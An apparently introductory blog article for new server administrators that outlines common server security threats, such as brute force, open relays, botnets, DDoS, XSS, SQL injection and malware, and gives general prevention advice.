Photo by The Planet
It is easy to get a server. Anyone can setup a machine in his basement and start publishing websites. Furthermore, most web hosting companies offer leased servers and virtual private servers at affordable prices. All of this means that someone with absolutely no experience can start a server, publish websites, or even host other people’s sites.
Fortunately, there are plenty of forums and online documentation to help newbie system administrators get started. If you happen to be one of them or even if you are not, there several security threats to Internet-connected servers that you should be aware of and know how to prevent and mitigate. These 10 threats are common ones that attackers like to use to either gain access to your server or bring it to its knees.
Brute Force Attack
In a brute force attack, the intruder attempts to gain access to a server by guessing a user password (usually the root administrator) through the SSH server, Mail server, or other service running on your system. The attacker will normally use software that will check every possible combination to find the one that works. Brute force detection software will alert you when multiple failed attempts to gain access are in progress and disable access from the offending IP address.
A Mail Transfer Agent (MTA) normally uses an SMTP server to send email from your server’s users to people around the world. With an open relay, anyone can use your SMTP server, including spammers. Not only is it bad to give access to people who send spam, it could very well get your server placed on a DNS blacklist that some ISPs will use to block mail from your IP. It is very easy to close an open relay. Just follow the documentation for your MTA.
Attackers use botnets to automatically run and distribute malicious software on “agent” servers. They then use the agent machines to attack or infect others. Because all of this can be done automatically without user intervention, botnets can spread very quickly and be deadly for large networks. They are commonly used in DDoS attacks and spam campaigns.
DoS stands for Denial of Service, and is a technique attackers will use to effectively shut off access to your site. They accomplish this by increasing traffic on your site so much that the victim’s server becomes unresponsive. While some DoS attacks come from single attackers, others are coordinated and are called Distributed Denial of Service (DDoS) attacks. Often times, the users of computers executing a DDoS do not even know their computers are being used as agents.
Cross-site scipting or XSS is a technique that makes use of vulnerabilities in web applications. According to UK dedicated hosting server specialists at 34SP.com, the vulnerability allows the attacker to inject code in a server-side script that they will use to execute malicious client-side scripts or gather sensitive data from the user. You can fix most XSS problems by using scanner software to detect vulnerabilities and then fix whatever you find.
Like XSS, SQL injection requires a vulnerability to be present in the database associated with a web application. The malicious code is inserted into strings that are later passed to the SQL server, parsed, and executed. As with other vulnerability-dependent attacks, you can prevent it by scanning for problem code and fixing it.
Malware can take many forms, but as the name implies, it is malicious software. It can take the form of viruses, bots, spyware, worms, trojans, rootkits, and any other software intended to cause harm. In most cases, malware is installed without the user’s direct consent. It may attack the user’s computer and/or attack other computers through the user’s own system. Having proper firewall and security software protection can usually prevent malware from spreading.
Most threats to a server can be prevented simply by having up-to-date, properly-patched software. All server operating system vendors and distributions publish security updates. By installing them on your system in a timely manner, you prevent attackers from using your server’s own vulnerabilities against it.
The number one, most prevalent threat to a server’s security is user carelessness. If you or your users have passwords that are easy to guess, poorly written code, unpatched software, or a lack of security measures like anti-virus software, you are just asking for trouble. By enforcing strong security practices and secure authentication, you can lessen or even eliminate most threats.